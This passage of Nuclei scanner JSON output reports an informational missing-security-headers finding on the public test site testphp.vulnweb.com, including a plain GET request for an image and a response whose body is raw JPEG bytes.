'http://testphp.vulnweb.com/wvstests'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/7.jpg.tn\",\"path\":\"/pictures/7.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/7.jpg.tn\",\"request\":\"GET /pictures/7.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/606.1.36 (KHTML, like Gecko) Version/9.1.2 Safari/606.1.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 6458\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:42:21 GMT\\r\\nEtag: \\\"4dca64a1-193a\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0001\\u0005\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0006\\u0000\\u0002\\u0004\\u0005\\u0007\\u0003\\u0001\\u0008\\ufffd\\ufffd\\u00006\\u0010\\u0000\\u0002\\u0001\\u0003\\u0003\\u0003\\u0002\\u0004\\u0005\\u0002\\u0007\\u0000\\u0003\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0004\\u0005\\u0011\\u0000\\u0012!\\u0006\\u00131\\\"A\\u00072Qa\\u0014\\u0015#q\\ufffdB\\ufffd3CR\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0003\\u0000\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0004\\u0005\\u0006\\u0001\\u0003\\u0007\\u0000\\u0002\\ufffd\\ufffd\\u00000\\u0011\\u0000\\u0001\\u0003\\u0003\\u0002\\u0004\\u0003\\u0008\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0000\\u0002\\u0003\\u0004\\u0005\\u0011!1\\u0012\\u0013AQaq\\ufffd\\u0006\\u0014\\\"2\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0015B\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\ufffdI\\ufffdKMc\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffdܡ\\ufffdy!\\ufffd2\\ufffd\\ufffdw\\u0005c\\ufffdϓϑ\\ufffd\\u0019\\ufffd|x\\ufffd\\u001bT]K=$4n\\ufffd2\\ufffd\\u0014ʌb\\ufffd\\ufffd\\u000c\\ufffd\\u0018,1φ\\ufffdG\\ufffdQz~\\ufffd\\ufffd=t\\ufffdW\\ufffd\\u0002\\u001aF*\\ufffdO0uw\\ufffdG\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd|\\ufffd\\ufffdq\\ufffd7\\u003c6nI\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\u0012)]%?\\ufffd\\ufffd@\\ufffd\\u000ez\\ufffdq\\ufffd\\ufffd\\ufffd\\u0014\\u0003\\ufffds\\ufffdj~\\ufffd\\ufffdE \\ufffd\\ufffd\\ufffd\\ufffdμ\\ufffd\\ufffd\\u0017\\ufffdRׄ\\ufffdH\\ufffd7Y_$\\ufffd5\\ufffd\\ufffdT\\ufffd\\ufffd\\u0018Bʤ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd}\\u001d\\ufffd\\u0026\\ufffd#R\\ufffd\\ufffd\\ufffdO\\ufffdd\\u003e\\ufffd\\ufffd y\\ufffd\\u001c\\ufffd\\ufffd\\u0007VR\\u001c\\ufffd\\u0001u\\ufffdv\\ufffd4*Q\\ufffd\\u0018\\ufffd\\ufffd \\ufffd\\ufffd\\ufffdަ\\u0003\\n\\u0014\\ufffd;\\ufffd\\ufffd\\ufffd\\u000c\\ufffdppt5\\\\\\ufffd\\ufffda\\ufffdl\\u0006\\ufffd\\ufffd:\\ufffdL\\ufffd\\ufffd\\u00059\\u0007$\\ufffd5ǧ\\ufffd3\\ufffd\\ufffd\\ufffd\\ufffdi\\ufffd\\ufffdvb`\\ufffdJ\\ufffdd\\ufffd\\u000f\\ufffd\\ufffdjNﶃ:B\\ufffdu\\ufffd)\\ufffd2\\u001fS;\\ufffd\\u0014\\ufffd\\\"\\ufffdİ\\ufffd\\u0007r\\ufffd\\u0004\\u0000K1\\u0003h\\ufffd\\u0003:.W\\ufffd\\ufffdY\\ufffd\\ufffd\\ufffd;\\ufffdw\\nCI9\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\tϝ3w\\ufffdH\\ufffd\\ufffdD\\ufffdp\\ufffdf\\ufffdy\\ufffd\\u000b\\rp\\ufffd\\ufffd\\ufffd\\u00171\\ufffd~\\u000e7x϶uWCw\\ufffdD\\ufffd\\u000b\\ufffd\\u0012E@\\ufffd\\u000e\\ufffd\\u0018\\u0012FAR}\\ufffd\\ufffd\\ufffd\\u000f\\u0007\\u0004\\u00105:V\\ufffd\\ufffd\\ufffdr\\ufffd\\ufffd\\ufffd\\ufffd0\\ufffdѐ7W\\u000c\\ufffd\\ufffd\\u0017n04\\ufffd o}r\\ufffdN\\u003e\\ufffd\\ufffd+\\rb\\ufffd':\\ufffd6Ll\\u0011\\ufffd\\ufffd8lx\\ufffdBt\\ufffd\\ufffd\\ufffdc+[\\ufffd\\ufffd\\ufffd\\ufffd\\u000fIt\\ufffdj\\ufffdY!\\ufffd\\ufffd!\\ufffd^\\ufffdqʑ\\ufffd,{\\ufffd疉q\\ufffd_\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdd\\u0014\\ufffd\\ufffdG$P\\ufffd\\ufffd\\n\\u000eԳ\\ufffd\\ufffd\\r\\ufffdR\\ufffd\\ufffd\\ufffd\\ufffd\\u003cg\\u001cx\\ufffd]\\ufffdH\\ufffd\\u001dT\\ufffdJ\\ufffdVشQ\\ufffd\\ufffdl\\ufffddd\\ufffd\\u0003$g*\\u0008\\u0004\\ufffd\\u0000\\ufffd:\\ufffdr\\ufffd\\u001bg\\ufffdM$\\ufffd\\u0004h\\ufffd\\ufffd\\ufffd\\ufffdV\\ufffdKm\\u0018\\u0000珮F\\ufffdE\\u001bc\\ufffd\\ufffd\\ufffd\\ufffd\\u0018\\ufffd󟲧\\ufffdϚ\\ufffd\\u001b \\ufffdS\\ufffd\\u0000v\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000b\\ufffd\\u0012\\ufffd\\u0008c}\\ufffdPHq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdKQ\\u001cK\\ufffdWD\\\\\\ufffd\\ufffd8\\ufffd\\ufffd\\u000f\\ufffdӬ\\ufffd\\ufffdR\\ufffd\\ufffdi\\ufffd#U+:Y\\ufffdJJ\\ufffd\\ufffd\\ufffd2B\\ufffd\\ufffd\\u000cW \\ufffd\\ufffdA\\ufffd\\u0000q\\ufffd\\u0019\\ufffd\\u0000Ρy\\ufffdi\\ufffd\\ufffd;^\\u0013\\ufffd4\\ufffd8\\u001f}}a|\\u0012\\ufffd\\\\Zu\\ufffd\\ufffd\\ufffd\\u0015\\u001eP\\ufffd\\ufffd\\ufffd±\\ufffd\\u0004\\ufffd\\u0006\\ufffd//_\\u000c\\ufffdOC\\ufffd\\ufffd\\u0014KP\\ufffdXa/\\ufffdj\\ufffd!F\\u0007k8;\\ufffd@%x$`\\ufffdRx\\ufffd_U\\n\\ufffd\\ufffdb\\ufffd\\ufffdI\\u0005E\\u001c\\ufffd\\ufffd%1\\ufffd8\\ufffd;\\ufffd\\ufffd\\ufffd\\ufffd`\\ufffd\\ufffd\\ufffd\\ufffd\\u0007:Ww\\ufffd\\ufffdL\\ufffd\\ufffdrF\\ufffdP{;8\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdu'\\ufffd\\ufffd\\ufffd\\\\::\\ufffdb\\u00163G\\ufffdB\\ufffd!;Ӎ\\ufffd\\u001caW\\ufffd\\ufffd\\ufffd\\ufffd\\u003c\\u000fa\\ufffd$\\ufffd`s\\ufffd\\ufffd\\ufffd+䦪Ji\\ufffd\\u0018\\u0012Aߌ+.\\u001d_\\ufffd\\ufffd\\u0005P\\ufffd\\ufffd]X\\u0001\\ufffd\\ufffd\\u00006\\ufffdZ\\ufffd8\\ufffd\\u001eK\\ufffd\\u0018D\\u0019c\\ufffd\\u0018\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdk\\ufffd\\ufffd[o4O\\u0015nk[\\ufffd\\ufffd\\ufffd\\ufffd}ƚ\\ufffd}\\ufffd7u\\ufffdĴ3H\\ufffd\\ufffdM\\ufffd7q\\u0026\\ufffd\\ufffd*\\ufffd\\ufffd\\ufffd\\ufffdN\\u0007\\ufffd\\ufffdp\\ufffdա\\ufffdw\\ufffdq\\ufffd\\ufffd\\ufffd~\\ufffd\\u0001\\ufffd~\\ufffd\\ufffd\\ufffd=\\ufffd\\ufffdE\\ufffd锳\\ufffd|\\ufffd\\ufffdLnp\\ufffd\\\\3$\\u000e\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\n\\ufffd\\ufffd;\\ufffdB\\ufffd\\ufffd\\ufffd\\ufffd(b\\ufffdG\\ufffd8c\\ufffd\\u0001vg,Ac\\ufffd\\u0013$\\ufffd\\u0005\\ufffd\\u0000J^\\ufffd^=\\ufffd\\ufffd\\ufffd\\ufffdϝ\\nu+\\ufffdQG:\\u0019B\\u000c\\u001c\\ufffd#\\ufffd\\ufffd΄\\ufffd`q\\u0012\\ufffd\\ufffdM\\ufffd\\u0013[[\\ufffdC\\ufffdx\\ufffd]\\ufffd\\ufffd\\u00158\\ufffd4F:s\\u0013\\\"\\ufffd\\ufffd\\ufffdRRT\\ufffdy \\ufffd\\ufffd\\ufffd|\\ufffd\\ufffd\\ufffdR\\ufffd3\\ufffd\\ufffd\\u0002\\ufffd\\ufffdܮ}\\u0011=ʎ\\u0016\\ufffd\\ufffd\\ufffd(bhi`H\\ufffd\\u0000\\u0011\\u0000\\u0005\\\";\\u0011F\\ufffdI\\ufffd\\n\\ufffd?0b\\ufffd\\ufffd:z\\ufffd=L\\ufffd4ҁ\\ufffd\\u0008\\ufffd\\u0001G\\u0007\\ufffd\\u0000}\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\u0000\\ufffd\\u001c`t\\ufffd?\\ufffd8\\ufffdX\\u001bN\\ufffd$/\\ufffd[Vt\\ufffd\\u003c\\u001c\\ufffd\\ufffd\\ufffdimS\\ufffd@er\\ufffdC\\u000c\\u0011\\ufffd\\u000cu\\u0005\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdB\\ufffd\\ufffdv\\ufffdC\\ufffd8\\ufffd \\ufffd8\\ufffd \\ufffd\\ufffdD\\ufffd\\ufffduC\\ufffdZ\\ufffdH\\ufffds\\t\\ufffd\\ufffdϾ|\\u0018\\ufffd\\u003eO\\ufffd\\u0008\\u001e\\ufffd\\ufffd\\ufffd \\ufffd\\ufffd\\u0016\\ufffd\\u001d\\u001c\\ufffd!\\ufffd\\u003e(*\\ufffdVl\\ufffdPϲX\\ufffdgqHӘ\\ufffd]\\ufffd\\ufffd\\t\\u000c\\ufffd\\ufffd6L\\u001cn8q.\\u0015A\\u0018!\\ufffd\\ufffd\\ufffd\\u00005\\ufffd\\ufffd\\ufffd\\ufffd'\\ufffd\\ufffd\\ufffd\\u0013\\ufffd\\u0016\\u0013\\u0006\\u0014\\ufffd9`\\ufffd\\u0005\\u0008;9\\u0007$\\ufffd\\u0003\\ufffdhJ\\ufffd\\ufffdӳ\\ufffdI\\ufffdu=]\\u0015X\\u0002\\ufffd\\u000c\\ufffd\\u000b\\ufffd'\\ufffdT\\ufffd_\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\u0001l\\ufffd\\ufffd̴\\u00157\\u001b|\\ufffd!\\ufffdId\\ufffd\\u0015-\\u0018\\ufffd\\ufffdw+6_\\ufffd\\u000b\\u0000\\ufffd\\ufffd\\ufffd\\ufffd|\\ufffd\\ufffd\\ufffdjJ:\\ufffd\\ufffdr\\ufffd,\\u000c\\ufffd\\ufffd\\ufffdL\\u001d\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd5\\u0015%W\\r\\ufffd\\u0013\\ufffd\\ufffdp5$\\ufffd\\u0016\\ufffdiHऎ\\u0018c\\u0011\\\"q\\ufffd\\u000c\\u0000s\\ufffd\\u0000~\\ufffd\\u001f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd{\\ufffd(\\n1\\ufffd\\ufffd7\\u001c}\\ufffd\\ufffd\\u0000mH\\ufffdީ\\ufffd\\u000f\\ufffd2f\\ufffdi=\\ufffd\\ufffdL\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffda\\ufffd\\ufffd\\ufffd2F\\ufffd\\u000c$esɩ\\ufffdyt\\ufffd\\u0007\\ufffd\\ufffd\\ufffd\\ufffdw\\u001d7\\ufffd\\ufffd\\u0003g\\ufffd\\ufffd':ނ\\ufffdLs\\ufffdUq\\t#`@ \\ufffd}KsƸK\\ufffd5\\ufffdj\\u0016\\ufffd\\ufffdi\\ufffd@\\ufffd].\\u0004sȒƵ\\u0012\\u000c\\ufffd\\ufffd\\ufffd퐟\\ufffdp\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\ufffd\\ufffdd\\u0012\\u0015\\ufffd\\ufffd*\\ufffdt\\ufffdU\\ufffdLf\\ufffda\\u0006A\\u0002\\u0017S\\u001b\\ufffd;\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000c0q\\ufffd\\u0005\\u0000\\ufffdu\\ufffd\\ufffd\\ufffd_P6ᐰ#\\ufffd\\n\\ufffd\\ufffd\\u0011\\ufffd\\u0008\\ufffd\\ufffd\\u0013[)\\ufffdp\\ufffd\\ufffd\\ufffd\\ufffdKOz\\ufffd\\ufffdr\\ufffd\\ufffd\\u0006p\\ufffd$\\ufffd\\ufffd\\ufffdr\\ufffd\\ufffd[y\\ufffd\\ufffdM;\\u001ao\\ufffd4\\ufffd\\ufffd\\ufffd!f, /\\ufffdع^\\u0010\\ufffd`\\ufffd\\u0005\\u0001ƢuM/P\\ufffd\\ufffd%\\ufffd\\ufffd\\ufffdL\\ufffd\\ufffd1H\\ufffd\\ufffd\\ufffde\\ufffd5\\ufffd\\ufffd\\u0026с\\ufffd(]\\ufffd\\ufffd!G\\u0003R:\\ufffd\\u0014J\\t\\ufffd\\ufffd4\\ufffd\\ufffde\\ufffdy\\ufffd\\ufffd\\ufffd%\\ufffd\\u000e\\ufffd\\ufffd\\ufffd|g\\u0019\\ufffd\\u0001$\\ufffd~f\\ufffd=Uj\\ufffdu\\u0015\\ufffdJj\\ufffd\\ufffdAQG:\\ufffd-c\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000eq\\ufffd\\ufffd#\\ufffd\\ufffdˑ\\ufffd\\ufffd\\ufffd\\ufffd~r0s\\ufffd\\ufffd˷n\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdl\\ufffds1\\ufffd\\ufffd\\ufffdGIw\\ufffd\\u0012CW\\u0004\\ufffd\\ufffd\\ufffdv\\ufffds\\ufffdG\\u001c\\u00022\\u000e\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdsQQ\\u000c\\ufffd\\ufffd\\u001dE-\\u003c2\\\"\\ufffd\\ufffd\\ufffd \\ufffdeV\\ufffd\\ufffdq\\ufffd\\ufffd9\\ufffd\\ufffdr\\u0018\\u0000\\ufffd\\ufffd\\ufffd\\ufffd0\\ufffdXk\\ufffd\\u0006\\ufffd\\ufffd\\ufffd\\ufffd\\u0014J\\ufffdu\\ufffd\\ufffd\\u000e\\ufffd\\ufffd\\n2\\ufffd\\u001d\\ufffd\\ufffd2.\\u0014r@\\u003cx\\ufffdk=MT߄\\u0012,P\\ufffd\\ufffd,-Q\\u001a\\ufffdr\\ufffd\\ufffd=L1\\ufffdp`s\\ufffd\\ufffd\\ufffdx\\ufffd=\\ufffdhk\\ufffd#9#ӧ\\ufffd\\n\\ufffdC\\ufffd'\\ufffdf\\ufffd\\u003e\\ufffdh\\ufffd\\ufffd%\\ufffd\\ufffd\\ufffd^mv\\ufffd\\ufffdK\\ufffd]R\\ufffd5=\\ufffd\\ufffd;\\u003e%œ\\ufffd8\\u001bO,7z\\ufffdg蹵%ud\\ufffd2=\\ufffdR:\\ufffdw\\ufffdD\\u0011\\ufffd\\u0013\\ufffd\\u0017n\\ufffd\\ufffd\\ufffd\\u00047\\u003c\\ufffd\\u000c\\ufffd\\u001b\\ufffdAƑ\\ufffd\\ufffdAq\\ufffd|=\\ufffd\\ufffd\\ufffd-p\\\\j\\u0016\\u0026\\ufffdU\\u0003d\\ufffd\\ufffd\\ufffd\\ufffdX\\ufffd0US\\u0019l`\\u0005*\\ufffd\\ufffdg\\u0015\\ufffd\\ufffd\\ufffdx\\ufffd\\ufffd!\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0014HY\\ufffd\\u0000\\ufffd\\ufffd9\\ufffd\\u000f\\ufffd\\ufffdog\\ufffdk\\ufffd6\\ufffd\\ufffd8;\\ufffd\\ufffd\\u0026\\ufffdVq\\ufffd#ܕ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdz\\ufffd\\ufffdT\\ufffd9q\\u0018\\nN\\ufffdp\\u0007\\ufffdQ\\ufffd\\ufffd-\\u0018\\ufffd\\ufffd\\u001aeK\\ufffdB\\u000f \\ufffd\\ufffd\\ufffd\\ufffd\\u0017d.*Ȱ\\ufffdU=\\ufffd\\ufffdM|\\ufffd\\ufffd\\ufffdi\\ufffdA\\u0026\\ufffd0ʮ\\ufffd\\ufffdA\\r\\ufffdO\\u003ex\\ufffd\\ufffd\\u000f \\ufffdr\\ufffd^\\ufffd\\ufffd\\ufffd\\ufffdb\\ufffd\\ufffdi]c\\ufffd!M嘜\\u0001\\ufffd;\\ufffd \\u0000\\u0001\\ufffd\\u003c\\ufffd3_QJ\\ufffdj\\ufffd\\u0008\\u0012/y\\ufffdĀ(p\\ufffd,\\ufffdW\\u000cW!q\\ufffd\\u0004z\\ufffd\\ufffdȠ\\ufffd\\ufffde\\ufffd\\u0011\\ufffd_Qr\\ufffd\\ufffdĂ\\u001bz%E\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdGc\\ufffdS\\u0012\\ufffd|\\ufffd\\ufffd\\ufffd\\ufffd3\\ufffd\\ufffd)\\ufffd\\\"\\ufffd{\\twq\\ufffd\\ufffd\\ufffd㺴\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd̍ÇM5\\ufffd׺\\ufffd@\\ufffd\\ufffd\\ufffd\\ufffdV\\ufffdm\\ufffd\\ufffd\\u0019dd\\ufffd\\ufffdd\\ufffd\\ufffd!]\\ufffd\\ufffd)\\ufffd\\ufffd%G\\u0000d\\ufffd\\u0017h݃\\ufffd\\ufffdwr\\ufffd\\ufffd\\ufffd{b\\ufffdjƪ\\tQOH#\\u0005\\ufffdy\\ufffd1\\ufffd\\ufffd\\ufffd7\\ufffdp\\u0014\\ufffd\\ufffd\\u0017\\u000crqik\\ufffdK=m\\u003c\\ufffdco\\ufffd\\ufffd\\ufffd\\ufffdr\\ufffd\\u0015\\ufffd\\ufffdͶH\\\"pCD\\ufffd\\ufffd\\ufffd\\u0013\\ufffd\\ufffd@*FA\\u0019:\\ufffdq\\ufffd\\ufffd\\u001c\\ufffd\\ufffdQx\\ufffd?\\ufffd\\ufffdJcV\\ufffd\\ufffd\\ufffd~\\ufffd\\u0026U\\ufffd\\u0018\\ufffd\\u001e\\ufffdަ%@!\\ufffd\\u0018k\\ufffd\\ufffd\\ufffdTD̐5\\u001d\\ufffd\\ufffd\\ufffd\\ufffd[\\ufffd\\ufffd(\\ufffd\\ufffd;\\ufffd\\ufffd\\ufffd\\u001b}\\ufffd.VO̩%\\ufffd\\u0013\\ufffd\\ufffdB\\ufffd\\ufffd\\ufffd\\u0008+\\ufffdFőNH\\ufffd\\ufffd\\u001c0\\ufffd:9\\ufffd\\ufffdCGM\\u001c\\u0014\\ufffdG\\u0014(X\\ufffd\\\"\\ufffd\\u0001\\u003eO\\ufffdp\\ufffd\\u003ep\\ufffd\\ufffd4\\u0003C%e\\ufffd\\ufffd=\\u0015E\\ufffd\\ufffdFD\\ufffd1\\ufffd\\ufffdң\\u0010\\ufffd\\ufffdXn\\ufffdY\\u0018\\u0016![,U\\ufffd쓫UCMM\\u001b\\ufffdm\\u0013\\u0011\\ufffd\\ufffd\\ufffd\\ufffdŞA;\\u0004\\ufffd\\ufffdq\\ufffd\\ufffd(\\u001fh\\ufffdt\\u000e\\ufffdG\\ufffd\\ufffdt\\ufffd\\ufffd\\n\\ufffd\\u001b?\\ufffd\\ufffd\\ufffd\\ufffd \\ufffd~\\ufffd\\ufffd\\ufffd\\u0007\\ufffd\\ufffdeH\\u0016\\u0015!\\ufffd\\u001c\\ufffdrc\\ufffd\\ufffd\\\"eo\\ufffd\\ufffd\\ufffd׌\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000c!)\\u000eO\\ufffd\\ufffd\\u001b\\ufffdttQ\\ufffd\\ufffdp\\u000cq\\ufffd#2\\ufffdԜ\\u0003\\ufffd\\u0007?\\ufffd\\ufffd[\\ufffd\\ufffd\\u0000\\ufffd5]Z\\ufffdDp\\ufffd\\ufffd6KHi\\ufffdF\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdd k\\ufffdC\\ufffd\\ufffd\\u000bURW%1h\\ufffdf\\ufffd0LNHʹ\\u0005pp\\ufffd[$\\u00128\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd4k4k\\u000ctp\\ufffdQ\\ufffdj\\u0014\\u0006\\u0005\\ufffd\\ufffd\\ufffd\\u0004d\\ufffdb\\u003e\\ufffd\\ufffd\\u0000涁d1\\u0019^I;_/u\\ufffd`\\ufffdU\\ufffdϾ\\ufffdPO\\ufffd(\\u001eڪ\\ufffdSb'\\n9\\ufffd\\u001a\\ufffd\\ufffd\\ufffd\\ufffd;\\ufffdQ\\ufffd\\u001bco\\ufffdV\\ufffd\\ufffd(\\ufffdo.\\ufffd`\\u001e\\ufffd砺\\ufffd\\ufffd=\\u001bU4\\ufffd_s\\ufffd\\ufffd\\ufffd̴\\ufffd0H\\ufffd`\\ufffd]\\ufffd%\\ufffdڛd9\\u001e\\ufffd\\ufffdǖ\\ufffdjΣ\\ufffd{\\ufffd\\ufffd\\ufffd%m\\ufffd\\ufffd$\\ufffd\\ufffdMٍ\\ufffdi\\ufffdA\\ufffd~\\u0000\\u0000\\ufffd\\u0007 \\ufffd\\ufffdg!\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\ufffdX\\ufffd\\ufffdG'|\\ufffdL\\ufffd\\ufffd\\u0015\\ufffdU5\\ufffd\\ufffdF\\u0019\\ufffd\\ufffd8\\ufffd\\ufffd\\ufffd^K\\u0013C̣-9\\ufffdm\\u0015\\u003cw\\u0010\\ufffd\\u0019\\ufffd\\ufffd{\\ufffd\\ufffd\\ufffd|A\\ufffdZ\\ufffd\\ufffdqhb\\ufffd\\ufffdX)\\ufffd\\ufffdV.\\ufffd\\n$\\ufffd\\ufffdV\\ufffd\\ufffd\\u003e\\ufffdAb\\ufffd\\ufffd\\ufffd\\ufffd3\\ufffd\\ufffd\\ufffdm\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdh\\ufffdH\\ufffdե\\ufffd\\ufffdnL\\ufffd\\ufffd!M\\ufffd\\ufffd\\ufffd#:=\\ufffd-Cp4\\ufffd\\ufffdV\\ufffd\\ufffde\\ufffdd\\ufffd\\ufffd\\u0004\\ufffd\\ufffd$\\ufffd]\\ufffd9\\u000c\\ufffd\\u0001\\ufffd\\u003cc\\u001ccZGZOWm\\ufffd\\ufffd\\ufffd\\ufffdVe\\ufffd\\ufffd\\ufffd5c*\\u0026\\ufffd\\u0000\\ufffdO\\ufffdn\\ufffd9\\u003c\\ufffd\\ufffd\\ufffd\\ufffd5΢\\ufffdݣ9\\u0019\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdMyBQ\\ufffdwY\\ufffdw\\ufffd*\\u000c\\u0001fWڏ\\u000e\\ufffd\\ufffd\\u0012\\ufffd\\ufffd\\u0019\\ufffd8]\\ufffda\\u0019\\u0004\\ufffd\\ufffd\\u0000\\u001fQ[SU\\ufffd\\ufffd\\ufffd\\u001c\\u0014\\ufffdћ\\\\Tp\\\\.\\u0017j\\ufffdV\\ufffd\\ufffd\\ufffd!\\u000b\\u0012\\ufffdQcUe-\\ufffdd\\ufffd\\ufffd\\ufffd\\ufffdP\\u0000;\\ufffd\\ufffd\\ufffd\\ufffdE4d\\ufffd)h\\ufffd\\ufffd3\\ufffd\\ufffd\\ufffd\\ufffd \\u0012\\u0001ǶH\\ufffd\\ufffduk}ɵ-.\\ufffd\\ufffd\\ufffd\\ufffdgO\\ufffd\\ufffd7;G\\ufffd\\ufffd\\ufffd-ӿs\\ufffdN\\ufffdVDA\\u0019ld\\ufffdJ\\ufffd2\\u0000$\\u0003\\ufffd\\ufffdp\\ufffd\\ufffd\\ufffd7U.\\ufffdY%\\ufffd\\ufffdZ%\\ufffd\\ufffd\\ufffd\\ufffd\\ufffde\\ufffd\\u0003~\\u003eV%X\\ufffd\\ufffd'\\ufffd\\ufffd\\ufffd\\ufffd\\u0018%z\\ufffdWM;F\\ufffdv\\u001f\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdé\\ufffd\\ufffd\\ufffd\\ufffd}?UCp\\ufffd[\\ufffdvj\\ufffdTn\\ufffd\\ufffd~\\ufffdɂ\\ufffdF1\\ufffd\\ufffd\\ufffd\\ufffdO,t\\ufffd\\ufffdq\\ufffd\\u0008\\ufffd\\ufffdϏ\\ufffdT\\ufffd\\ufffdm\\ufffd\\ufffd8;\\ufffd\\ufffd+A\\ufffdKUl\\ufffdW$\\ufffd{c\\ufffd;\\ufffd\\ufffdȩj'W\\u0006\\u0005A\\ufffd\\u001bҪIS\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\rc\\u0015\\u0015\\ufffd_\\ufffd\\ufffd\\ufffdqV\\u001d\\ufffdaI6\\u0000\\u000e\\ufffd\\ufffd]\\ufffd\\r\\ufffdU\\ufffd\\ufffd\\ufffd\\n\\ufffd[WY]h\\ufffdJ\\ufffd\\ufffdm\\ufffd\\ufffdWYd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdJ\\ufffd(\\ufffd\\ufffdQ\\u0013v\\ufffd\\ufffd@_\\ufffdQ\\ufffd\\ufffds\\ufffdܱ\\ufffd\\ufffd5\\ufffd\\ufffdA\\u0007b\\ufffd\\ufffd9h\\ufffd+$\\ufffdUWA\\ufffdHm\\ufffdGX\\ufffd\\u0003\\u0003f\\ufffdƒ\\ufffd\\ufffdY%\\ufffd\\ufffd\\ufffd\\ufffd.'